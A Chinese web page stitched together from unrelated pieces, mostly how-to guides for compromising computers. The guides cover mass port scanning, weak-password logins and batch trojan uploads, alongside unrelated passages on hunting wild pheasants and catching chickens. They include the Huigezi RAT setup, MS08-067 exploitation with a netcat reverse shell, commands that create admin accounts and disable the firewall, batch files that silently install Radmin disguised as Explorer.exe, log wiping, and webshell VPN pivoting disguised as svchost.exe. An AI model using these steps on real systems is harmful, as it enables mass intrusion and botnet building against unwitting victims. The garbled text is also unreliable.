各端口抓肉鸡的几种方法

其实问题主要是网络的结构问题的理解上面了灰鸽子(服务端）要求你的条件是对方（控制端）的ip(你要控制的机器,其实它是被你做成了服务器了,叫做服务端)是外网的：外网的ip是怎么样的？要求不是192.168.x.x开头，10.10.x.x也不行，这两种ip是校园网等的内网常用的ip通常你们在网吧是不可能令到灰鸽子上线的，一般来说只有是家庭的adsl才有可能是公网的了。

（一般来说其它的可能都是不多的，例如：一些校园网内部的服务器，他们的ip是公网的，是不同的）你们经常看到一些内网的灰鸽子上线的教程可以说都是骗人的，虽然他们说的是可行的,但是他们不说实现的条件. 但是事实上你们没有这样的条件的！至于申请域名的事情是对于你自己的ip来说的。

(我一会儿具体补充)但是要明白对方（控制端）的ip也是内网的话，你是没有办法的。

比如我的ip是10.10.2.3 但是实际上我的公网ip是221.4.188.50这个221.4.188.50是几十人到几百人在用的，是用到nat技术的网络（至于什么是nat，我不说了啦，你们去网上查查把）。

你永远也不可能直接连接到我的，（直接？）你要连接到我只有一种可能:（间接连接：中间通过一个外网的服务器，下面的讲解联系到灰鸽子自带的端口映射工具。

方法：生成映射服务端，放到他们学校的服务器。

不一定要控制他们学校的服务器。

上线地址填被你控制机器的IP。

）就是你控制了我们学校的一些服务器:ip是202.192.240.0这个网络的电脑是公网的.你就可以通过他连接到我而且还要我告诉你我的ip是什么才行啊.因为你永远也不知道我的内网ip是什么.除非你控制了我们的路由器.至于对方的ip是192.168.x.x这个也是一样的原理.你永远不会连接到它,除非....(我上面说了拉)至于自动上线的条件麻，就是多了一个：（其实自动上线的话，是令到你的肉鸡直接连接到你（你的ｉｐ）！！！什么？你的ｉｐ会变化的？这时候就用到域名了。

灰鸽子配置内网上线批量扫135端口抓肉鸡设置详细解释加图片说明第一:先打开灰鸽子(如图1)初始界面。

现在开始配置服务端(如图2)其他几项不重要按个人要求来选,主要是填写公网IP、域名填好后生成服务端保存在指定路径！注：本人用的是固定公网IP 所以只需要填写IP 在局域网使用灰鸽子需要做端口映射！介绍一个映射工具=================比特精灵端口映射工具UPnP局域网专用(如图3)===============打开工具以后点下一步它会自动查找UPNP设备 (去掉忽略ICF防火墙前面的勾～)查找出设备后(如图4)下一步开始设置(如图5)设置好后下一步提示添加映射端口成功!(如图6)映射成功后不要关闭工具！==============================================================配置好服务端以后接下来测试一下鸽子是否能上线！只要运行一下(如图7)鸽子配置好测试成功能上线了接下来批量扫135端口抓肉鸡！！用十段S扫描器扫几段IP(如图8)开始以后出现DOS界面扫到的IP全是开135端口的机器(如图9)呵呵还不少呢～～扫完以后DOS界面会自动关系在文件目录下出现一个文档我们用扫描整理器处理一下只保留干净的IP 点“修正并保存文件”处理后在目录下会出现一个的文件！(如图10)找到开135端口的IP 就该用NTscan 这个工具扫135的空口令了！(如图11)就先扫到这里其实还有好多呢！！关闭NTscan以后会在目录下自动建出一个的文件里面还是未经过处理的IP需要把没用的字符去掉保留干净的IP 这里我们用记事本自带的替换功能就可以完成！不用说大家因该都会。

处理后的IP 连空格都需要去掉！(如图12)筛选出开135端口空口令的IP以后需要用一个批量开23端口的工具把这些IP的23端口全部打开！(如图13)点开始工具会自动批量开23端口程序运行还是在DOS界面下处理开好23端口后DOS窗口自动关闭,接下来用端口过滤工具把开好的23端口再次过滤在抓肉鸡的时候更加准确！把刚才找到的文件后缀改成lst为呵呵这个工具只能后缀lst的文件所以要改一下后缀改好后打开工具导入开始过滤！(如图14)下一步导出过滤好的IP另存为文件！操作到这里已经一大半了全是批量处理还不是累就是耗时间接下来是最重要的部分了就是批量传马了废话不多说继续！我们先用Serv-U架设一个FTP 以后在传马的时候会用上(用别人的FTP空间也可以去免费空间申请一个就行本人是自己架设的空间别人的不稳定权限设置的很严格不能上传EXE文件或是下载上传带宽做了限制比较慢)架设FTP我想大家也都会我也就不介绍了！(如图15)是我简单架设的FTPFTP架设好以后配置一下JS脚本！(如图16)安装批量传马的工具安好后运行配置(如图17)打来—>选项—>全局选项—>编辑默认设置—>选正编写好的JS脚本下一步运行批量传马工具填写配置基本和批量开23端口类似！(如图18)填写好以后点开始工具自动运行JS脚本批处理传马呵呵现在鸽子提示已经有肉鸡让线了不过不是很多因为我的小马没有做免杀！可怜～～看看有3只肉鸡了！(如图19)哈哈还有一个德国小鸡～～下一步运行批量传马工具填写配置基本和批量开23端口类似！(如图18)填写好以后点开始工具自动运行JS脚本批处理传马呵呵现在鸽子提示已经有肉鸡让线了不过不是很多因为我的小马没有做免杀！可怜～～看看有3只肉鸡了！(如图19)哈哈还有一个德国小鸡～～==============此文章只供参考学习若使用给别人带来损失本人概不负责==============OK教程到此结束，请不要用于非法用途哦。

新手抓鸡方法大全2009-09-09 01:02抓鸡很多人都会，但不一定全会，今天，我对所有方法做总结，也会介绍！首先是端口抓鸡，一般比较常用！有3389、1433、445、139、135等3389端口抓鸡工具:WINNTAutoAttack自动攻击器（扫漏洞）；SQLTOOLS（SA空口令连接器）；RAMDIN影子3.0中文版（远程控制程序）（RADMIN注册码:08US9A95I+lKa9nbOLXqv0V8xqdDvKGcNcTpN2wV11iSqOCVuA6A5KKZRHc5GVMIybWomK6rNwoj8mYy8LXRFi23）；SC.exe port.bat query.exe quser.exe（隐藏3389服务及不让管理发现自己程序）；CleanIISLog.exe（小榕的擦PP程序）；3389.exe（开3389端口服务的）；psu.exe（使用被禁止的Guest帐户要用到的）；mstsc.exe（远程桌面连接程序）。

一.扫到SA弱口令(自动攻击器)二.用SQLTOOLS连上去建一个用户net start telnet开telnet服务net user mint mint /add添加用户mint密码为mint net localgroup administrators mint /add将帐号mint升级为管理员三.上传后门程序RAD.EXE(RADMIN服务端自解压程序)制作RAD.EXE过程:1、到Radmin安装目录下找到AdmDll.dll、 raddrv.dll和r_sever.exe；2、在本地设置服务端（一定要生成）；设置密码-->>设置连接端口(默认4489)-->>生成3、导出注册表HKEY_LOCAL_MACHINE\SYSTEM\Radmin的键值为1.reg；4、编写一个批处理，并命名为u.bat；@echo offnet stop r_server5、写第二个批处理，r.bat,内容为：@echo [url=mailto:off@Explorer.exe]off@Explorer.exe[/url] / uninstall /silence@Explorer.exe /install /silence@regedit /s 1.reg@echo[url=mailto:off@Explorer.exe]off@Explorer.exe[/url] /uninstall / [url=mailto:silence@Explorer.exe]silence@Explorer.exe[/url] /install /silence@regedit /s 1.reg@net start r_server@delrad.exe@del 1.reg@del r.bat@del u.bat6、将AdmDLL.dll raddrv.dll Explorer.exe(r_sever.exe改名) u.bat r.bat 压缩成Rad.RAR压缩包；7、将Rad.rar制作成自解压文件；选择Default.sfx的自释放模块-->>高级自释放选项-->>常规释放路径:%systemroot%\system32安装程序:释放后运行:r.bat 释放前运行u.bat-->>摸式缄默模式:全部隐藏覆盖方式:覆盖所有文件-->>确定-->>确定生成完成。

黑客常用的攻击方法以及防范措施1.密码暴力破解包括操作系统的密码和系统运行的应用软件的密码，密码暴力破解方法虽然比较笨，成功几率小，可是却是最有效的入侵方法之一。

因为服务器一般都是很少关机,所以黑客就有很多时间暴力破解密码，所以给系统及应用软件起一个足够复杂的密码非常重要。

2。

利用系统自身安全漏洞每一次严重的系统漏洞被发现,都会掀起找肉鸡(被入侵并被安装了后门的计算机）热，因为这类入侵经常发生在系统补丁发布与客户部署更新这个时间段里,所以在第一时间内给系统打上补丁相当重要,这就要求广大的网络管理员了解关注这方面的信息。

3。

特洛伊木马程序特洛伊木马的由来：大约在公元前12世纪，希腊向特洛伊城宣战。

这是因为特洛伊王子劫持了Sparta国王Menelaus的妻子Helen（据说是当时最美的女子）.战争持续了10年,特洛伊城十分坚固，希腊军队无法取得胜利。

最终，希腊军队撤退，在特洛伊城外留下很多巨大的木马，里面藏有希腊最好的战士.特洛伊城的人民看到这些木马，以为是希腊军队留给他们的礼物，就将这些木马弄进城。

到了夜晚，藏在木马中的希腊士兵在Odysseus的带领下打开特洛伊城的城门,让希腊军队进入，然后夺下特洛伊城。

据说“小心希腊人的礼物”这一谚语就是出自这个故事.特洛伊木马是指一个程序表面上在执行一个任务,实际上却在执行另一个任务。

黑客的特洛伊木马程序事先已经以某种方式潜入你的计算机，并在适当的时候激活，潜伏在后台监视系统的运行，执行入侵者发出的指令,木马程序是一种计算机病毒,也叫后门程序。

4.网络监听网络监听工具原来是提供给网络管理员的管理工具，用来监视网络的状态，数据流动情况,现在也被网络入侵者广泛使用。

入侵者通过在被入侵的计算机上安装Sniffer软件，可以捕获该网段的敏感信息，其中包括一些明文密码,并对数据包进行详细的分析，就有可能对该网段其他的计算机产生安全威胁，所以说网络监听造成的安全风险级别很高。

利用MS08067远程溢出漏洞抓肉鸡说明：（1）由于扫描出来的结果比较少，所以直接看就可以了。

如果结果比较多，可以到sfind扫描目录下直接打开sfind.txt 扫描结果。

注意：（1）在溢出过程还有多种提示例如“Make SMB Connection error:64”（2）出现“Maybe Patched！”提示的计算机也可能溢出成功。

（3）仅仅对台湾和简体中文版本有效，对其他版本的服务器及时存在445漏洞也无法溢出，原因是操作系统溢出点内存地址不同。

3.监听“4444”端口在执行扫描的计算机上使用nc监听4444端口，具体命令为“nc –vv ip地址4444”，例如“nc –vv 218.69.*.2 4444”，一次不成功的溢出显示结果为“nc -vv 218.22.27.71 4444Warning: forward host lookup failed for : h_errno 11002:TRY_ [218.22.27.71] 4444 (?): TIMEDOUT sent 0, rcvd 0: NOTSOCK”，这说明218.22.27.71可能已经安装补丁、防火墙禁止对外进行连接等情况，导致溢出不成功。

说明：在MS08067中可以定制监听端口，不过那个端口需要在源程序中定制。

4.继续进行溢出将以上脚本在反弹的shell中直接粘贴即可从Ftp服务器上下载，然后可以在反弹的Shell中执行下载的文件。

在本次渗透过程中，由于是相邻IP，因此使用了一个简便的方法，即单击“开始”-“运行”，在其中输入“\\IP\admin$”或者“\\IP\C$”并确定，如图6所示，如图能够连接，则会出现一个输入网络密码的提示框，在用户和密码中分别输入刚才添加的用户名。

8．获取系统详细信息以及执行各种命令使用MS08067溢出工具成功溢出服务器后，还可以使用“telnet IP地址4444”连接被溢出服务器，如图8所示，偶使用telnet进行了尝试，获取系统信息并开放了3389端口。

关于电媒引野鸡方法技术关于电媒引野鸡体会（决对是不是网上抄来的哦）不管是新手，还是有经验者，都反应野鸡很难引来。

这是为什么呢！网上有说，全国野鸡的亚种很多的，也有说野鸡很精的，更有说野鸡电媒是抓不到。

一定要用鸡媒的。

以下我们就一起分析引不来鸡的原因：野鸡难抓，难在那里呢，说到底是在野鸡太精明，纯野生货先不说观察了，就想靠近都难，还有一点就是母野鸡很少会叫，就连老猎人一辈子也难得听上几次，就这更增加了对母音诱公使用难度。

本人体会野鸡确实是很精的，特别是对声音的判断。

本人用电媒KO公鸡无数，基本上是公的，偶也得公带母来打架被套到。

有时遇上性旺公鸡300米多远的距离飞来，找到电媒刚叫声地方，误差不会小于30厘米。

用母媒时，其实母媒跟本不用叫。

只要往天上一抛，母媒发出的扇翅风声，就能把几百米外的公鸡闻音引来。

关于野鸡亚种说法，本人不太支持。

在中国生长的野鸡，都为脖子上有白环的野鸡，不管南方北方，都一样。

公叫声都是“哥。

哥扑。

扑”。

这点大家都能认同.但母叫很多人认为不一样，我个人感觉也是，但这个不是因为亚种之类说法原因，而是因为母鸡小叫有很多种。

有种哑声叫的母叫为：母换小鸡的叫声。

叫这音时，大概1分钟叫一次，常见的就是带小鸡的母鸡，被冲散后。

唤儿女们叫声，想要听到这种叫声，得在鸡被冲散地方，人藏起来，静等5-10分钟才会有。

音圆润小叫声大概3分钟叫一次：这种多为换公或换母叫声。

大体主要有这两种，其他来说。

因为个体原因，音量稍有不同。

还有一点，就是很多学抓野鸡的朋友，都看过“日不落”吹野鸡哨的视频，视频真假我不作判断。

毕竟人外有人，天外有天，但这么要说2点，就是野鸡来的速度，不是每次像他视频里放的那样快。

有时要等上半小时也有可能。

另外放音不能太频繁要5分钟样子叫一声。

这两点误区一定要改过来。

不然想抓到野鸡很难的。

综合以上分析：电媒套鸡能不能引来野鸡，主要还在以下4点，只要这4点做到，野鸡一定会来。

能不到套到，就要看你下套的技术了，下套技术，在“抓野鸡技术”里有另有介绍。

抓肉鸡首先需要一个免杀的鸽子，别的木马也可以，这些论坛都有。

新手如果做不好黒防鸽子的免杀的话，建议换个别的木马，如守望者，上兴，PcShare.黑洞and so on.相对而言免杀比较好做。

免杀几乎是一切基础，所以一定要学好免杀，我们的“黑基论坛"的免杀方面很不错，新手朋友要多多学习了，多思考，多动手，多提问，相信你免杀会有很大的进步的，(*^__^*) 嘻嘻……这里讲解下原理和方法，不具体操作演示，不方便还要控制下教程的大小，另外重要的是我认为新手朋友应该多自己动手实践下，看别人的教程演示跟着一般的做是不会有什么很大的进步，要学习思路和原理，自己动手实践，在不断的解决困难中进步。

我走到今天的一点点感触，和新手分享下。

下面开始正题：以下内容需要回复才能看到1：扫3389端口抓肉鸡这个方法比较简单，适合新手朋友。

原理：国内流传着一种克隆版的XP，安装后会默认开启一个账号为new,密码为空的账户，而且基本上都是默认开放3389服务的，我们就可以利用这一点来抓肉鸡。

方法：扫描工具（如S等等）扫一段IP的3389端口，扫完后就直接用3389连接器连接开放3389的机器，也可以把结果保存为文本，用批量生成3389连接的工具生成链接，比较方便的，然后输入账号new登入，如果别人的电脑前没人的话你就可以去你的空间下载你传好的木马然后安装。

这种方法只能是XP系统，如果遇到2000或者2003系统就不要试了，除非有输入法漏洞，不过现在很少了，还有那么多的3389，干嘛在它上面浪费时间呢。

汗- -！这个方法缺点也是大大的，XP只支持单用户登入，，你再登入上去就会把他挤出去，而且不可以抓国外的肉鸡。

建议：中午或者半夜行动，因为有很多的人会开着机子下载，杀毒啊，去睡觉。

我们就有可乘之机了。

(*^__^*) 嘻嘻……2：扫135端口抓肉鸡步骤：A:a-先用扫描器扫一段IP的135端口b-整理一下c-NTSCAN过滤有弱口令的机器d-最后用recton开telnet传马B:有一些自动抓鸡工具，功能类似，如Bluisland,Wmi,蜜蜂，知音等等，比较傻瓜化的。

1.一般XP都很难扫不出IP，先要突破一下，可以用工具是“使xp支持syn扫描”，运行就重启。

线程就可以达到10240，然后将每次扫描，关闭防火墙命令是"net stop sharedaccess"，一般都可以扫出IP，如果还不行，换个IP段。

2.扫描环境一般都是XP系统，但其实扫描IP速度很慢，而且扫不多！我建议抓鸡最好用服务器，服务器指2003系统，因为2003系统扫描速度快，而且扫到很多IP，是很好的抓鸡系统！3.抓鸡方法135端口，先扫描135IP，然后整理！然后用NTscan，扫描弱口令，最后用Recton上传木马，自动运行的！因为这个漏洞很久，所以端口也很少的了！如果整理IP不好，就很难扫出弱口令。

1433端口，先扫描1433IP，然后整理！然后用X-Scan-v3.3，扫描模块只选择SQL-Server 弱口令，然后扫出漏洞主机，再用SQLTools.exe连接，看看能不能执行DOS，如果不能就修复下，可以用“SQL查询分析器修正分离版”，修复命令我会打包的了！3389端口，先扫描3389IP，然后用远程桌面连接，一个一个IP添加进入，见到XP，用户new 密码为空进入，然后下载木马！见到2000，用户administrator密码为空进入然后下载木马！4899端口，先扫描4899IP，然后整理！然后用4899探测器，A导入4899IP，然后开始搜索，B就是空口令的IP了，然后用Radmin，点连接到，把刚才扫到的空口令的IP添到IP地址那里，点确定，然后自己上传马，用DOS运行！5900端口，用领域小组专版VNC扫描器，这个端口有些特别，不同其他的端口，所以扫IP 工具也不同，扫到IP，看看有无V字开头，然后用VNCLink连接，自己然后下载马拉！80端口，先扫描80IP，然后整理，再用Apache Tomcat导入IP，端口8080改为80，等IP 全部导完，点开始就可以，你看看有无一些网站结尾是HTML或者很长的，就可以进入这个网，然后上传个“hcskk.war”然后点hcskk.war进入，就可以自己下载木马，再用DOS运行。

捉家鸡的方法和技巧
捉家鸡的方法和技巧可能因情境和鸡的性格而异，以下是一些建议，但请注意确保在捉捕过程中不伤到鸡或自己：
1.使用食物引诱：
•用一些鸡喜欢的食物，比如谷物、虫子或水果，引诱鸡靠近。

当它们靠近时，可以迅速伸手捉住。

2.在夜晚捉捕：
•鸡在夜晚通常会变得较为安静和温顺，因此在夜晚捉捕可能更容易。

使用手电筒或其他光源，悄悄接近鸡。

3.使用篮子或箱子：
•准备一个合适大小的篮子或箱子，悄悄地将篮子放在鸡的周围，迅速抓住鸡，将其放入篮子中。

4.使用捕鸟器具：
•有一些专门用于捉捕鸟类的捕鸟器具，如捕鸟网、捕鸟笼等。

使用这些器具需要技巧，确保在使用时小心谨
慎，以避免伤害鸡。

5.靠近鸡群中的弱者：
•如果有一群鸡，尝试接近群体中的较为温顺或较为弱小的个体。

它们可能更容易捕捉。

6.缓慢移动：
•鸡对快速移动和突然的动作可能感到紧张。

缓慢移动、轻声细语，避免引起它们的警觉。

7.利用结缰绳：
•对于已经被训练或习惯使用的鸡，可以利用一个长而轻的结缰绳。

悄悄地把绳子套在鸡的脖子周围，然后轻
轻拉紧。

请注意，捕捉鸡的过程需要耐心和谨慎，确保在任何时候都对鸡和自己都不会造成伤害。

此外，不同品种和个体的鸡可能对人的接触有不同的反应，因此需要根据实际情况调整捉鸡的方法。

0×00 前言早前疯子黑阔的事件引起了大家的关注，我想身为基友的我们也要保护下自己的资料吧，所以就在研究VPN劫持 (VPN Pivoting) 的技术，现在一般隐藏IP的方法是:1) 用免费或收费的VPN软件连接，Proxy，匿名浏览的网站等等，但这些服务商都会把大家的上网记录存在日志里，要追查时也很容易。

2) 一些基友会把肉鸡变成私人的VPN服务器，但需要提权和做很多设定，一些有硬件防火墙的服务器也未必能开启端口。

我就在想平时拿下的Webshell可否利用，经过不断的找寻和尝试后，终于成功实现了正向和反向的VPN劫持，以下是其优点:1) Webshell能执行命令即可，不用提权。

2) 默认的Network Service权限，或被降权为普通用户组皆可。

3) 除非服务器有安全策略或软件限制了用户的网络功能，一般能成功。

4) Windows 2003 / 2008 实测成功。

(2008 R2未测试成功，未知是否该服务器安全策略阻挡，待求证)5) 使用的软件名为PacketiX VPN，数千家大型企业在使用，不会被防毒软件阻挡。

0×01 正向VPN的建立利用环境:1) 一般在公司、学校、网吧等在内网不能在自己一方开启端口的情况下。

2) 目标服务器的443端口开启而未被占用，为什么是SSL的443呢? 这是最有可能已开启但未被使用的。

3) 如果端口不能使用，请看下一章「反向VPN的建立」。

好了，先打开VPN劫持工具包 -> Server目录，开启vpn_server.config档案，寻找“declare SecureNAT”，把Disabled参数更改为false，保存档案。

(请参阅「声明」部分)把vpnserver.exe (主程式) 、vpn_server.config (配置) 、hamcore.se2 (核心档) 上传到服务器，64位的主程式也在工具包中，以下的示范以Windows 2003进行，小菜把主程式更名为svchost.exe。

首先要跟大家解释就是什么是肉鸡：肉鸡就是被黑客攻击和入侵，在电脑里面放入了病毒和木马之类的后门程序，拥有管理权限的远程电脑，受入侵者控制的远程电脑。

肉鸡可以是各种系统，如 windows2003、linux、unix等，更可以是一家公司、企业、学校甚至是政府军队的服务器。

我朋友告诉我,一天他利用这个漏洞成功抓到了 3000多台肉鸡,也就是说3000台电脑,成为了他的傀儡..虽然现在网络上流传了很多安全辅助软件,360卫士,金山卫士,360杀毒,瑞星杀毒,卡巴斯基杀毒等等.但是为什么还是有那么多人还是会沦为受别人控制的肉鸡呢?那么大家就有必要看看以下对如何避免电脑成为肉鸡的方法了。

几种常见的肉鸡挂马方法：1. Winrar压缩包攻击所谓的压缩包攻击,就是在压缩文件里捆绑一个木马或病毒,当打开的时候自动运行,一般这种攻击都是自解压格式。

这种情况经常在各大网站也经常出现，所以下载之前文件必须杀毒软件扫描一下。

2.自释放攻击某些软件内部自己带毒,在运行的时候自动释放.这种方式相对来说不是很多3.挂马攻击利用网站页面,挂马这种方式目前最多,但是难度也比较高,首先必须要入侵网站或者有网站管理权限才行4.端口扫描攻击借助扫描工具和漏洞利用工具,达到攻击的目的攻击的方法很多，这里就只是列出一部分，如果大家想了解黑客挂马的方法，建议大家百度一下，这里就不多说了。

看了上面的入侵方法，虽然种类很多，但是大家做好以下列出的防范方法，就能帮助大家不受挂马和病毒的侵扰了!第一. 杀毒软件杀毒软件必装,至于说装1个,2个还是3个那都是个人喜好,哪怕装20个也没人说你不对.这里可能有些朋友会说,我比较喜欢裸奔,裸奔这么久也没事呀.人们常说久走夜路必撞鬼现在你或许没事,不代表以后没事.所以我还是建议大家装一个杀毒软件,毕竟花不了多少时间.相比中毒后重装系统所花时间相比,我想下载安装杀毒软件或许更快吧..第二. 安装辅助软件.360卫士,金山卫士等.这些安全辅助软件既能优化系统,又可以智能安装补丁.还可以直观的反应系统中可能存在的一些风险,下载安装一个一举几得.而且也比较方便第三. 封闭不需要用到的端口和服务关闭系统中不必要的端口、服务、共享等.因为很多时候多数网友都只借助360卫士做了优化,这点却忘记做了，如果关闭这些呢?但是可以查看本站的一篇文章：如何关闭端口。